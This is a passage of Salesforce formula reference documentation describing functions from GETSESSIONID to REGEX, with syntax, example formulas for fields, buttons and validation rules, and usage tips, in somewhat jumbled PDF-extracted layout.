when creating a task list button. Use {!GETRECORDIDS($ObjectType.Event)} when
creating an event list button.

• This function is only available in custom buttons, links, and s-controls.

GETSESSIONID

Returns the user’s session ID.Description:

GETSESSIONID()Use:

HYPERLINK
("https://www.myintegration.com?sId="&

Example:

GETSESSIONID() & "?&rowID="&Name & "action=CreateTask","Create
a Meeting Request")

creates a link to an application outside of Salesforce, passing the parameters so that it can
connect to Salesforce via the API and create the necessary event.

HTMLENCODE

Encodes text and merge field values for use in HTML by replacing characters that are reserved
in HTML, such as the greater-than sign (>), with HTML entity equivalents, such as &gt;.

Description:

{!HTMLENCODE(text)} and replace text with the merge field or text string that contains
the reserved characters.

Use:

If the merge field foo__c contains <B>Enter the user's name<b>,
{!HTMLENCODE(foo__c)} results in: &lt;B&gt;Enter the user&#39;s
name&lt;/b&gt;

Example:

This function is only available in custom buttons and links.Tips:

HYPERLINK

Creates a link to a URL specified that is linkable from the text specified.Description:

HYPERLINK(url, friendly_name [,target]) and replace url with the Web address,
replace friendly_name with the link text, and, optionally, replace target with the window
or frame in which to display the content.

Use:

Creating Events

HYPERLINK("00U/e?
retURL=%2F006x0000001T8Om&what_id="

Example:

& Id,
"Create Event")
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adds a link called “Create Event” that, when clicked, creates a new event that is associated
with the current object.

Phone Dialer

HYPERLINK("http://servername/call?id=" & Id & "&phone=" & Phone,
Phone)creates a linkable phone number field that automatically dials the phone number
when clicked. In this example, replace "servername" and "call" with the name of your
dialing tool and the command it uses to dial. The merge field, Id, inserts the identifier for
the contact, lead, or account record. The first Phone merge field tells the dialing tool what
number to call and the last Phone merge field uses the value of the Phone field as the linkable
text the user clicks to dial.

Tips: • Hyperlink formula fields are of type text.
• Include the protocol and URL in quotes as in HYPERLINK("http://www.cnet.com",

"cnet").
• Avoid using text functions such as LEN, LEFT, or RIGHT on HYPERLINK function

results.
• When linking to Salesforce pages, use a relative link, such as “00U/e?retURL=%...”, for

hyperlink formulas unless you want to add the formula field to a search layout. Use the
complete URL, including the server name and https://, in a hyperlink formula to add it
to a search layout. Note that formula fields are not available in search result layouts.

• Use the $Api variable to reference API URLs.
• Be sure to remove the brackets, [ and ], from your formula before validating it.
• The target parameter is optional. If you do not specify a target, the link opens in a

new browser window. Some common target parameters are:

_blank
Displays link in a new unnamed window.

_self
Displays link in the same frame or window as the element that refers to it.

_parent
Displays link in the immediate frameset parent of the current frame. This value is
the same as _self if the current frame has no parent.

_top
Displays link in the full original window, canceling any other frames. This value is
the same as _self if the current frame has no parent.

For more information on basic HTML tags, consult an HTML reference on the Internet.
• The HYPERLINK function is available everywhere that you can define a formula except

default values, field updates, s-controls, validation rules, approval processes, custom
buttons and links, and workflow rules.

See Also:
Operators and Functions I – Z
Formula Operators and Functions
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Operators and Functions I – Z
Use the following operators and functions when building formulas. Click on the name of the operator or function below to
view more details. All functions are available everywhere that you can include a formula such as formula fields, validation rules,
approval processes, and workflow rules, unless otherwise specified.

Note:  Extraneous spaces in the samples below are ignored.

IF

Determines if expressions are true or false. Returns a given value if true and another value if
false.

Description:

IF(logical_test, value_if_true, value_if_false) and replace logical_test
with the expression you want evaluated; replace value_if_true with the value you want

Use:

returned if the expression is true; replace value_if_false with the value you want returned
if the expression is false.

Overdue Payments

IF(AND(Payment_Due_Date__c < TODAY(),Payment_Status__c ="UNPAID")
, "PAYMENT OVERDUE", null)

Formula Field Example:

This formula determines if the payment due date is past and the payment status is “UNPAID.”
If so, returns the text “PAYMENT OVERDUE” and if not, leaves the field blank. This
example uses a custom date field called Payment Due Date and a text custom field called
Payment Status.

Insert Tax Rate

Use this default value formula to set the tax rate of an asset based on the user's city. Create
a custom percent field with the following default value:

IF($User.City = "Napa", 0.0750,
IF($User.City = "Paso Robles", 0.0725,
IF($User.City = "Sutter Creek", 0.0725,
IF($User.City = "Los Olivos", 0.0750,
IF($User.City = "Livermore", 0.0875, null
)
)
)
)
)

{!
IF(Sample.BillingCountry = "US",

Custom Button Example:

"http://maps.google.com/maps?q="&Sample.BillingStreet&
"+"&Sample.BillingCity&"+"&Sample.BillingState&"+
"&Sample.BillingCountry,
(IF(Sample.BillingCountry = "UK",
"http://maps.google.co.uk/maps?q="&Sample.BillingStreet
&"+"&Sample.BillingCity&"+"&Sample.BillingCountry,
"http://maps.google.com")))
}
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This example uses the IF function to determine if an address is in the United States or United
Kingdom so that it can use the appropriate type of Google map to display the address.

Tips: • Make sure your value_if_true and value_if_false expressions are the same data
type.

• When using an IF function with the $Profile.UserType variable to determine the type
of Salesforce user license the logged in user has, use the following values:

◊ Standard for Salesforce
◊ PowerPartner for PRM User
◊ CustomerSuccess for Customer Portal User
◊ PowerCustomerSuccess for Customer Portal Manager

For example, use the following formulas to determine if the logged in user has the license
type in quotes:

IF(ISPICKVAL($Profile.UserType ,"Standard"), 100, 0.1)

IF(ISPICKVAL($Profile.UserType ,"PowerPartner"), 100, 0.1)

IF(ISPICKVAL($Profile.UserType ,"CustomerSuccess"), 100, 0.1)

Note:  $Profile merge fields are only available in Enterprise, Unlimited, and
Developer Editions.

IMAGE

Inserts an image with alternate text and height/width specifications.Description:

IMAGE(image_url, alternate_text, height, width) and replace image_url
with the full path to the image; replace alternate_text with the string of text you want

Use:

to appear when the image can’t be rendered for some reason, and which can be used by screen
reader software; replace height with the vertical size of the image in pixels; replace width
with the horizontal size of the image in pixels.

HYPERLINK("ymsgr:sendIM?" & Yahoo_Name__c,
IMAGE("http://opi.yahoo.com/online?u=" & Yahoo_Name__c &
"&m;=g&t;=0", "Yahoo"))

This formula displays a clickable Yahoo! Messenger icon indicating if the person is logged
on to the service. Users can click the icon to launch a Yahoo! Messenger conversation with

Example:

the person. This example uses a custom text field called Yahoo Name on contacts where you
can store the contact's Yahoo! Messenger ID.

Tips: • The height and width parameters are optional.
• Use a text string to replace the image_url and alternate_text parameters. Surround

each text string in quotes.
• Use numbers to replace the height and width parameters.
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• Add images to your Documents tab if you want to display them elsewhere. For example,
store the image of a product in a document folder, copy the URL to the document, and
paste that URL in the image_url parameter of a formula field on the Products tab.

• If you use Internet Explorer, you may need to change your security settings so that it does
not display a warning prompt when images use HTTP protocol. See the online help for
Internet Explorer for instructions on changing your security settings.

• The IMAGE function cannot include the GETSESSIONID function as one of its
arguments.

• The IMAGE function is available only in formula fields and email templates.

INCLUDE

Returns content from an s-control snippet. Use this function to reuse common code in many
s-controls.

Description:

{!INCLUDE(source, [inputs])} and replace source with the s-control snippet you
want to reference. Replace inputs with any information you need to pass to the snippet.

Use:

Including Header Snippet

<html> <body> {! INCLUDE($SControl.Header_Snippet, [title = "My
Title",

theme = "modern"])} </body> </html>

S-Control Example:

This example references a snippet that provides a header for a page that you created to display
in a Web tab. It displays the page title “My Title.” Use the $SControl global variable to
reference a custom s-control.

Including Input Parameters

Use the following two examples to see how you can create a reusable snippet and include it
in an s-control.

<h2
class=”{!$Request.titleTheme}.title”>

{!$Request.titleText}</h2>

This snippet requires two input parameters: titleTheme and titleText. It is a reusable
HTML tag that presents a page title and theme based on input parameters. Next, create an
s-control that includes this snippet:

<html> <head> </head> <body> {!
INCLUDE($SControl.Title_Snippet, [titleTheme =

"modern", titleText = "My Sample Title"]) } ... Insert your page
specific content

here ... </body> </html>

This s-control uses the snippet titled Title_Snippet to display the title of the page “My
Sample Title” and modern theme. Replace Insert your page specific content
here with your own HTML content and use the s-control as the source of a Web tab to
create your own pages in Salesforce.
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Tips: • Because this function references an s-control snippet and does not copy it, it always runs
the latest content of the s-control snippet. Remember when making a change to your
s-control snippet that it affects all INCLUDE functions that refer to it.

• Use the $Request global variable to access any information inside the snippet.
• This function is only available in custom buttons, links, and s-controls.

INCLUDES

Determines if any value selected in a multi-select picklist field equals a text literal you specify.Description:

INCLUDES(multiselect_picklist_field, text_literal) and replace
multiselect_picklist_field with the merge field name for the multi-select picklist;
and replace text_literal with the multi-select picklist value you want to match in quotes.

Use:

INCLUDES(Hobbies__c, "Golf") returns TRUE if one of the selected values in the
Hobbies custom multi-select picklist field is Golf.

Examples:

Tips: • The text_literal expression must be of type text and enclosed in quotes. It cannot
be a merge field or the result of a function.

• Salesforce returns an error if any of the following occurs:

◊ You do not provide a text_literal expression.
◊ You provide an empty text_literal expression, such as "" or " ".

• Use ISBLANK to determine if a multi-select picklist field is empty.
• Use the PRIORVALUE function inside the INCLUDES function to check if the previous

value of a multi-select picklist field included a specific value. For example:

INCLUDES(
PRIORVALUE(multiselect_picklist_field),

text_literal
)

ISBLANK

Determines if an expression has a value and returns TRUE if it does not. If it contains a
value, this function returns FALSE.

Description:

ISBLANK(expression) and replace expression with the expression you want evaluated.Use:

(IF(ISBLANK(Maint_Amount__c), 0, 1) +
IF(ISBLANK(Services_Amount__c), 0,1) +

Example:

IF(ISBLANK(Discount_Percent__c), 0, 1) +
IF(ISBLANK(Amount), 0, 1) +
IF(ISBLANK(Timeline__c), 0, 1)) / 5

This formula takes a group of fields and calculates what percent of them are being used by
your personnel. This formula field checks five fields to see if they are blank. If so, a zero is
counted for that field. A “1” is counted for any field that contains a value and this total is
divided by five (the number of fields evaluated). Note that this formula requires you select
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the Treat blank fields as blanks option under Blank Field Handling while the
Advanced Formula subtab is showing.

Tips: • Use ISBLANK instead of ISNULL in new formulas. ISBLANK has the same
functionality as ISNULL, but also supports text fields. Salesforce will continue to support
ISNULL, so you do not need to change any existing formulas.

• A field is not empty if it contains a character, blank space, or zero. For example, a field
that contains a space inserted with the spacebar is not empty.

• Use the BLANKVALUE function to return a specified string if the field does not have
a value; use the ISBLANK function if you only want to check if the field has a value.

• If you use this function with a numeric field, the function only returns TRUE if the field
has no value and is not configured to treat blank fields as zeroes.

ISCHANGED

Compares the value of a field to the previous value and returns TRUE if the values are
different. If the values are the same, this function returns FALSE.

Description:

ISCHANGED(field) and replace field with the name of the field you want to compare.Use:

The following validation rule prevents users from changing an object name after it has been
created: NOT(ISCHANGED(Name)).

NOT(AND(ISCHANGED(Priority), ISPICKVAL(Priority, “Low”))) is a validation
rule that ensures if a user changes the Priority of a case, the new priority cannot be “Low.”

Validation Rule Example:

NOT(AND(ISCHANGED(CloseDate), OR(MONTH(CloseDate) <> MONTH(TODAY()),
YEAR(CloseDate) <> YEAR(TODAY())),$Profile.Name <> "Sales Manager"))
is a validation rule that prevents a user from changing the Close Date of an opportunity
to a date outside of the current month and year unless that user has the “Sales Manager”
profile.

Note:  $Profile merge fields are only available in Enterprise, Unlimited, and
Developer Editions.

Tips: • This function is available only in:

◊ Assignment rules
◊ Validation rules
◊ Field updates
◊ Workflow rules if the evaluation criteria is set to Evaluate the rule when a

record is: created, and every time it’s edited.

• Use the NOT function to reverse the return values of TRUE and FALSE.
• This function returns FALSE when evaluating any field on a newly created record.
• If a text field was previously blank, this function returns TRUE when it contains any

value.
• For number, percent, or currency fields, this function returns TRUE when:

◊ The field was blank and now contains any value
◊ The field was zero and now is blank
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◊ The field was zero and now contains any other value

ISNEW

Checks if the formula is running during the creation of a new record and returns TRUE if
it is. If an existing record is being updated, this function returns FALSE.

Description:

ISNEW()Use:

Use the following validation rule to prevent users from creating a record with a close date in
the past. AND (ISNEW(), CloseDate < TODAY()) checks if the user is creating a new
opportunity and, if so, ensures that the Close Date is today or after today.

Use this validation rule to ensure users add at least one product to an opportunity after they
have created it.

NOT(OR(ISNEW(),HasOpportunityLineItem))

Validation Rule Example:

In this example, the validation rule formula displays the following error message when an
existing opportunity does not have any products: “You must add products to this opportunity
before saving.” This does not display an error on the initial save because they cannot add
products until after saving the record initially; but it prevents them from resaving or closing
an opportunity that does not contain products.

Tips: • This function is available only in validation rules, field updates, workflow rules, and
assignment rules.

• Use the NOT function to reverse the return values of TRUE and FALSE.
• This function always returns FALSE when used in a workflow rule with a time-based

trigger.
• This function always returns FALSE when used in a field update for an approval action.

ISNULL

Important: Use ISBLANK instead of ISNULL in new formulas. ISBLANK has the same functionality as ISNULL,
but also supports text fields. Salesforce will continue to support ISNULL, so you do not need to change any existing
formulas.

Determines if an expression is null (blank) and returns TRUE if it is. If it contains a value,
this function returns FALSE.

Description:

ISNULL(expression) and replace expression with the expression you want evaluated.Use:

(IF(ISNULL(Maint_Amount__c), 0, 1) +
IF(ISNULL(Services_Amount__c), 0,1) +

Example:

IF(ISNULL(Discount_Percent__c), 0, 1) +
IF(ISNULL(Amount), 0, 1) +
IF(ISNULL(Timeline__c), 0, 1)) / 5

This formula takes a group of fields and calculates what percent of them are being used by
your personnel. This formula field checks five fields to see if they are blank. If so, a zero is
counted for that field. A “1” is counted for any field that contains a value and this total is
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divided by five (the number of fields evaluated). Note that this formula requires you select
the Treat blank fields as blanks option under Blank Field Handling while the
Advanced Formula subtab is showing.

AND(ISPICKVAL(StageName, "Closed Won"),
ISNULL(Project_Start_Date__c))

Validation Rule Example:

This validation rule makes the Project Start Date custom date field conditionally
required whenever the stage is “Closed Won.”

Tips: • Text fields are never null, so using this function with a text field always returns false. For
example, the formula field IF(ISNULL(new__c) 1, 0) is always zero regardless of
the value in the New  field. For text fields, use the ISBLANK function instead.

• Multi-select picklist fields are never null in s-controls, buttons, and email templates, so
using this function with a multi-select picklist field in those contexts always returns false.

• Empty date and date/time fields always return true when referenced in ISNULL functions.
• Don’t use ISNULL for date/time fields.
• Choose Treat blank fields as blanks for your formula when referencing a

number, percent, or currency field in an ISNULL function. Choosing Treat blank
fields as zeroes gives blank fields the value of zero so none of them will be null.

• Merge fields can be handled as blanks, which can affect the results of components like
s-controls because they can call this function.

• When using a validation rule to ensure that a number field contains a specific value, use
the ISNULL function to include fields that do not contain any value. For example, to
validate that a custom field contains a value of '1', use the following validation rule to
display an error if the field is blank or any other number:

OR(ISNULL(field__c), field__c<>1)

ISNUMBER

Determines if a text value is a number and returns TRUE if it is. Otherwise, it returns
FALSE.

Description:

ISNUMBER(text) and replace text with the merge field name for the text field.Use:

OR(LEN(Bank_Account_Number__c) <> 10,
NOT(ISNUMBER(Bank_Account_Number__c)))

Validation Rule Example:

This validation rule ensures a custom text field called Bank Account Number is a number
of 10 digits and is not blank.

Tips: • This function returns FALSE for blank values.
• The ISNUMBER function is not aware of your locale. For example,

ISNUMBER("123,12") and ISNUMBER("1 000") return FALSE even if the user's
locale is “French.”

• Chinese, Japanese, Korean, and special characters including a space return FALSE.
• The ISNUMBER function returns TRUE for scientific formatting such as “2E2” or

“123.123.”
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ISPICKVAL

Determines if the value of a picklist field is equal to a text literal you specify.Description:

ISPICKVAL(picklist_field, text_literal) and replace picklist_field with
the merge field name for the picklist; replace text_literal with the picklist value in quotes.
text_literal cannot be a merge field or the result of a function.

Use:

Contract Activation

IF(ISPICKVAL(Status, "Activated"), NOW()-ActivatedDate, null) calculates
the number of days since the contract was activated. If the contract status is not “Activated,”
this field is blank.

Examples:

Commission Amounts

IF(ISPICKVAL(StageName, "Closed Won"),
ROUND(Amount *0.02, 2), 0)

This example calculates the commission amount for any opportunity that has a “Closed Won”
stage. The value of this field will be the amount times 0.02 for any closed/won opportunity.
Open or lost opportunities will have a zero commission value.

Competitor-Triggered Workflow

ISPICKVAL(Stage, “Closed Lost”) && INCLUDES(Competitor__c, “Acme”)

This formula in a workflow rule configures Salesforce to trigger the associated workflow
actions if the Competitor multi-select picklist field on a lost business is Acme.

Tips: • Replace picklist_field with a custom or standard field of type picklist.
• Your text_literal expression must be of type text and enclosed in quotes. It cannot

be a merge field or the result of a function.
• Use CASE functions to determine if a picklist value is equal to a particular value.
• When using the ISPICKVAL function to return the previous value of a picklist field,

include the PRIORVALUE function inside the ISPICKVAL function as in this example:

ISPICKVAL(PRIORVALUE
(picklist_field),
text_literal)

JSENCODE

Encodes text and merge field values for use in JavaScript by inserting escape characters, such
as a backslash (\), before unsafe JavaScript characters, such as the apostrophe (').

Description:

{!JSENCODE(text)} and replace text with the merge field or text string that contains
the unsafe JavaScript characters.

Use:

If the merge field foo__c contains <B>Enter the user's name<b>,
{!JSENCODE(foo__c)} results in: \u003CB\u003EEnter the user\'s
name\u003C\/b\u003E

Example:

This function is only available in custom buttons and links.Tips:
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JSINHTMLENCODE

Encodes text and merge field values for use in JavaScript within HTML tags by inserting
escape characters before unsafe JavaScript characters and replacing characters that are reserved
in HTML with HTML entity equivalents.

Description:

{!JSINHTMLENCODE(text)} and replace text with the merge field or text string that
contains the unsafe JavaScript characters.

Use:

If the merge field foo__c  contains <B>Enter the user's name<b>,
{!JSINHTMLENCODE(foo__c)} results in: &lt;B&gt;Enter the user&#39;s
name&lt;/b&gt;

Example:

Tips: • This function is only available in custom buttons and links.

LEFT

Returns the specified number of characters from the beginning of a text string.Description:

LEFT(text, num_chars) and replace text with the field or expression you want returned;
replace num_chars with the number of characters from the left you want returned.

Use:

TRIM(LEFT(LastName, 5)) & "-" & TRIM(RIGHT(SSN__c, 4))

This formula displays the first five characters ofta name and the last four characters of a social
security number separated by a dash. Note that this example uses a text custom field called
SSN.

Example:

Tips: • Reference auto-number fields as text fields in formulas.
• If the num_chars value is less than zero, Salesforce replaces the value with zero.

LEN

Returns the number of characters in a specified text string.Description:

LEN(text) and replace text with the field or expression whose length you want returned.Use:

LEN(PartNumber__c)

This formula returns the number of characters in a Product Code field.

Example:

LINKTO

Returns a relative URL in the form of a link (href and anchor tags) for a custom s-control
or Salesforce page.

Description:

{!LINKTO(label, target, id, [inputs], [no override]} and replace label
with the text for the link, target with the URL, and id with a reference to the record.

Use:

Inputs are optional and can include any additional parameters you want to add to the link.
The no override argument is also optional and defaults to “false.” It applies to targets for
standard Salesforce pages such as $Action.Account.New. Replace no override with “true”
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when you want to display a standard Salesforce page regardless of whether you have defined
an override for it elsewhere.

New Account S-Control

<html> <body> {!LINKTO("Create a New Account",
$Action.Account.New, $ObjectType.Account)} </body>

</html>

S-Control Example:

This example allows users to click a link to create a new account. It is useful in account list
views or Web tabs where you want users to create an account directly from that page. Use
the $Action global variable to access the new account page in Salesforce.

New Email Window S-Control

<html>
<body>
{!LINKTO("Email link",
"mailto:support@yourcompany.com?subject=Please%20Help")};

</body>
</html>

This example launches a new email window addressed to support@yourcompany.com with
the subject “Please Help” whenever a user clicks “Mail link.”

Link to Another S-Control

<html>
<body>
{!LINKTO("Check for duplicates",
$Scontrol.dedup_account, Account.Id)}

</body>
</html>

Use this example to generate a page containing a hyperlink labeled “Check for duplicates.”
When users click this link, Salesforce runs your custom s-control. This example assumes you
have already created a custom s-control to find duplicate accounts and merge their information.

Tips: • Avoid using this function in an inline s-control if you want it to open in a new window.
• Enclose multiple inputs in brackets to indicate they are together:

{!LINKTO("View Case", $Action.Case.View, Case.Id, [parm1="A",
parm2="B"])}

• Set inputs to null if you do not have any to pass yet you want to set the no override
argument:

{!LINKTO("View Case", $Action.Case.View, Case.Id, null, true)}

• When you override the tab home page for a standard or custom tab, set target to the
“Tab” $Action global variable and id to the object type. For example,
LINKTO("Accounts Tab", $Action.Account.Tab, $ObjectType.Account)

• This function is only available in custom buttons, links, and s-controls.
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LN

Returns the natural logarithm of a specified number. Natural logarithms are based on the
constant e value of 2.71828182845904.

Description:

LN(number) and replace number with the field or expression for which you want the natural
logarithm. Note: the LN function is the inverse of the EXP function.

Use:

LN(10) returns the natural logarithm of 10, which is 2.30.

LN(Value__c) returns the natural logarithm of a custom number field called Value.

Example:

LOG

Returns the base 10 logarithm of a number.Description:

LOG(number) and replace number with the field or expression from which you want the
base 10 logarithm calculated.

Use:

Salary

LOG(Salary__c) calculates the logarithm of a person’s salary. In this example, Salary is
a custom currency field.

Example:

Hydrogen

-LOG(Hydrogen__c) calculates the pH and acidity using the LOG function and a custom
number field called Hydrogen, which represents the concentration of Hydrogen ions in the
liquid measured in moles per liter.

LOWER

Converts all letters in the specified text string to lowercase. Any characters that are not letters
are unaffected by this function. Locale rules are applied if a locale is provided.

Description:

LOWER(text, [locale]) and replace text with the field or text you wish to convert to
lowercase, and locale with the optional two-character ISO language code or five-character
locale code, if available.

Use:

MYCOMPANY.COM

LOWER("MYCOMPANY.COM") returns “mycompany.com.”

Example:

Ticker Symbol

LOWER(TickerSymbol) returns the text in Ticker Symbol in lower case characters.

Applying Turkish Language Locale Rules

The Turkish language has two versions of the letter i: one dotted and one dotless. The locale
rules for Turkish require the ability to capitalize the dotted i, and allow the dotless I to be
lowercase. To correctly use the LOWER() function with the Turkish language locale, use the
Turkish locale code tr in the LOWER() function as follows:

LOWER(text, "tr")

This ensures that Salesforce does not transform any dotted i in the text to a dotless I.
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LPAD

Inserts characters you specify to the left-side of a text string.Description:

LPAD(text, padded_length[, pad_string]) and replace the variables:Use:

• text is the field or expression you want to insert characters to the left of.
• padded_length is the number of total characters in the text that will be returned.
• pad_string is the character or characters that should be inserted. pad_string is

optional and defaults to a blank space.

If the value in text is longer than pad_string, text is truncated to the size of
padded_length.

Field Name: Padding

LPAD(Name, 20)  truncates the Name field after 20 characters. For example, if the name
is mycompany.com, the value returned is "mycompany.com."

Example:

My_Company: No Change

LPAD('my_company.com', 14, 'z') returns “my_company.com” without change
because it has 14 characters.

Field Name Padded with Z

LPAD(Name, 15, 'z') returns the name “zmycompany.com.”

Field Name: Truncating

LPAD(Name, 2) truncates the name after the second character. For example, if the name
is mycompany.com, the value returned is “my.”

Leading blank spaces and zeros are omitted.Tips:

MAX

Returns the highest number from a list of numbers.Description:

MAX(number, number,...) and replace number with the fields or expressions from which
you want to retrieve the highest number.

Use:

Service Charge

MAX(0.06 * Total_Cost__c, Min_Service_Charge__c)

Example:

In this example, the formula field calculates a service charge of 6% of the total cost or a
minimum service charge, whichever is greater. Note that Min Service Charge is a custom
currency field with a default value of $15. However, you could make it a formula field if your
minimum service charge is always the same amount.

Book Royalties

MAX(0.10 * Pages__c,
(Retail_Price__c * 0.07) * Total_Sold__c)
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This formula determines which amount to pay in royalties for a book. It displays the greater
of two amounts: $0.07 for each book sold or $0.10 per page. It assumes you have custom
number fields for Pages and Total Sold and a custom currency field for Retail Price.

Commissions

MAX($User.Commission_Percent__c * Price,
Price * Account_Discount__c, 100)

This formula determines what commission to log for an asset based on which is greater: the
user's commission percentage of the price, the price times the discount percent stored for the
account or 100 dollars. This example assumes you have two custom percent fields on users
and assets.

MID

Returns the specified number of characters from the middle of a text string given the starting
position.

Description:

MID(text, start_num, num_chars) and replace text with the field or expression to
use when returning characters; replace start_num with the number of characters from the

Use:

left to use as a starting position; replace num_chars with the total number of characters to
return.

MID(Division, 3, 4) returns four characters of the Division name beginning with
the third character from the left. On a user record, this represents the department code.

Example:

MIN

Returns the lowest number from a list of numbers.Description:

MIN(number, number,...) and replace number with the fields or expressions from which
you want to retrieve the lowest number.

Use:

401K Matching

MIN(250, Contribution__c /2)

Example:

This example formula determines which amount to provide in employee 401K matching
based on a matching program of half of the employee's contribution or $250, whichever is
less. It assumes you have custom currency field for Contribution.

Bonus

MIN(Gross__c * Bonus_Percent__c,
Performance__c / Number_of_Employees__c)

This example determines an employee's bonus amount based on the smallest of two amounts:
the employee's gross times bonus percent or an equally divided amount of the company's
performance amount among all employees. It assumes you have custom number field for
Number of Employees, a custom percent field for Bonus Percent, and currency custom
fields for the employee's Gross and company's Performance.
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MOD

Returns a remainder after a number is divided by a specified divisor.Description:

MOD(number, divisor) and replace number with the field or expression you want divided;
replace divisor with the number to use as the divisor.

Use:

MOD(3, 3) returns 0

MOD(4, 3) returns 1

Example:

MOD(123, 100) returns 23

You may want to prevent users from scheduling meetings on a Saturday or Sunday. Use the
following example to apply a validation rule to a custom date field calledMy Date.

CASE(MOD(My_Date__c - DATE(1900, 1, 7), 7),
0, 0,
6, 0,
1) = 0

This example displays the following error message when the value of My Date is not Monday
through Friday: “My Date is not a weekday.”

MONTH

Returns the month, a number between 1 (January) and 12 (December) in number format of
a given date.

Description:

MONTH(date) and replace date with the field or expression for the date containing the
month you want returned.

Use:

SLA Expiration

MONTH(SLAExpirationDate__c) returns the month that your service-level agreement
expires. This example uses a custom date field called SLA Expiration Date.

Example:

Current Month

MONTH(TODAY()) returns the current month in a number format. For example, the month
of February would be the value “2.”

NOT

Returns FALSE for TRUE and TRUE for FALSE.Description:

NOT(logical) and replace logical with the expression that you want evaluated.Use:

IF(NOT(ISPICKVAL(Status, "Closed")), ROUND(NOW()-CreatedDate, 0),
null checks to see if a variable is open and if so, calculates the number of days it has been

Example:

open by subtracting the date and time created from the current date and time. The result is
the number of days open rounded to zero decimal places. If the variable is not open, this field
is blank.
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NOW

Returns a date/time representing the current moment.Description:

NOW()Use:

IF(ISPICKVAL(Status, "Open"), ROUND(NOW()-CreatedDate, 0), null)

This formula checks to see if a lead is open and if so, calculates the number of days it has
been open by subtracting the date and time created from the current date and time. The

Example:

result is the number of days open rounded to zero decimal places. If the lead is not open, this
field is blank.

Tips: • Do not remove the parentheses.
• Keep the parentheses empty. They do not need to contain a value.
• Use a date/time field in a NOW function instead of a date field. Created Date and

Last Modified Date are date/time fields whereas Last Activity Date is a date
field.

• Use TODAY if you prefer to use a date field.
• Dates and times are always calculated using the user’s time zone.
• Use addition and subtraction operators with a NOW function and other date/time fields

to return a number, representing number of days. For example NOW() - CreatedDate
calculates the number of days since the created date of a record. In this example, the
formula field data type is a number.

• Use addition and subtraction operators with a NOW function and numbers to return a
date and time. For example NOW() +5 calculates the date and time five days ahead of
now. In this example, the formula field data type is a date/time.

NULLVALUE

Important: Use BLANKVALUE instead of NULLVALUE in new formulas. BLANKVALUE has the same
functionality as NULLVALUE, but also supports text fields. Salesforce will continue to support NULLVALUE, so
you do not need to change existing formulas.

Determines if an expression is null (blank) and returns a substitute expression if it is. If the
expression is not blank, returns the value of the expression.

Description:

NULLVALUE(expression, substitute_expression) and replace expression with
the expression you want to evaluate; replace substitute_expression with the value you
want to replace any blank values.

Use:

(NULLVALUE(Sample_Due_Date__c, StartDate +5)

This formula returns the date five days after the start date whenever Sample Due Date is
blank. Sample Due Date is a custom date field.

Example:

Tips: • Avoid using this function with text fields because they are never null even when they are
blank. Instead, use the BLANKVALUE function to determine if a text field is blank.

• Don’t use NULLVALUE for date/time fields.
• Choose Treat blank fields as blanks for your formula when referencing a

number, percent, or currency field in a NULLVALUE function. Choosing Treat blank
fields as zeroes gives blank fields the value of zero so none of them will be null.
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• Use the same data type for both the expression and substitute_expression.

OR

Determines if expressions are true or false. Returns TRUE if any expression is true. Returns
FALSE if all expressions are false. Use this function as an alternative to the operator  || (OR).

Description:

OR(logical1, logical2...) and replace any number of logical references with the
expressions you want evaluated.

Use:

IF(OR(ISPICKVAL(Priority, "High"), ISPICKVAL(Status, "New")),
ROUND(NOW()-CreatedDate, 0), null)

This formula returns the number of days a case has been open if the Status is new or the
Priority is high. If the case was opened today, this field displays a zero.

Formula Field Example:

OR(Sample_Rate__c < 0, Sample_Rate__c > 0.40)Validation Rule Example:

This validation rule formula displays the following error message when the Sample Rate
custom field is not between 0 and 40%: “SampleRate cannot exceed 40%.”

PARENTGROUPVAL

This function returns the value of a specified parent grouping. A “parent” grouping is any
level above the one containing the formula. You can only use this function in custom summary
formulas for reports.

Description:

Summary and Joined: PARENTGROUPVAL(summary_field, grouping_level)

Matrix: PARENTGROUPVAL(summary_field, parent_row_grouping,
parent_column_grouping)

Use:

Where summary_field is the summarized field value, grouping_level is the parent
level for summary reports, and parent_row_level and parent_column_level are the
parent levels for matrix reports.

TOTAL_PRICE:SUM/PARENTGROUPVAL(TOTAL_PRICE:SUM, GRAND_SUMMARY)Example:

This formula calculates, for each product, its relative size compared to the grand total. In
this example, the report is a summary of opportunities and their products, grouped by
Product Name.

PREVGROUPVAL

This function returns the value of a specified previous grouping. A “previous” grouping is
one that comes before the current grouping in the report. Choose the grouping level and

Description:

increment. The increment is the number of columns or rows before the current summary.
The default is 1; the maximum is 12. You can only use this function in custom summary
formulas for reports.

PREVGROUPVAL(summary_field, grouping_level [, increment])Use:
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Where summary_field is the name of the grouped row or column, grouping_level is
the summary level, and increment is the number of rows or columns previous.

AMOUNT:SUM - PREVGROUPVAL(AMOUNT:SUM, CLOSE_DATE)Example:

This formula calculates, for each month, the difference in amount from the previous month
shown in the report. In this example, the report is an opportunity matrix with columns
grouped by Close Date and rows by Stage.

PRIORVALUE

Returns the previous value of a field.Description:

PRIORVALUE(field)Use:

The following validation rule prevents users from changing the expected revenue of an
opportunity after it is closed: AND(PRIORVALUE(Amount) > Amount, IsClosed).

Validation Rule Example:

Tips: • This function is available only in:

◊ Assignment rules
◊ Validation rules
◊ Field updates
◊ Workflow rules if the evaluation criteria is set to Evaluate the rule when a

record is: created, and every time it’s edited.

• This function does not return default values.
• When users create a new record, this function returns the value of the field referenced

rather than null. For example, if you create an account named “Acme,”
PRIORVALUE(Account.Name) returns Acme.

• When using the ISPICKVAL function to return the previous value of a picklist field,
include the PRIORVALUE function inside the ISPICKVAL function as in this example:

ISPICKVAL(PRIORVALUE
(picklist_field),
text_literal)

• Use the PRIORVALUE function inside the INCLUDES function to check if the previous
value of a multi-select picklist field included a specific value. For example:

INCLUDES(
PRIORVALUE(multiselect_picklist_field),

text_literal
)

REGEX

Compares a text field to a regular expression and returns TRUE if there is a match. Otherwise,
it returns FALSE. A regular expression is a string used to describe a format of a string
according to certain syntax rules.

Description:
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REGEX(text, regex_text) and replace text with the text field, and regex_text with
the regular expression you want to match.

Use:

This example ensures that a custom field called SSN matches a regular expression representing
a valid social security number format of the form 999-99-9999.

NOT(

Validation Rule Example:

OR(
LEN (SSN__c) = 0,
REGEX(SSN__c, "[0-9]{3}-[0-9]{2}-[0-9]{4}")
)
)

Tips: • Regular expression syntax is based on Java Platform SE 6 syntax. However, backslash
characters (\) must be changed to double backslashes (\\) because backslash is an escape
character in Salesforce.

• The Salesforce regular expression engine matches an entire string as opposed to searching
for a match within a string. For example, if you are searching for the name Marc Benioff,
use the regular expression, .*Marc Benioff.*, to find a match in a string like the
following:

According to Marc Benioff, the social enterprise increases
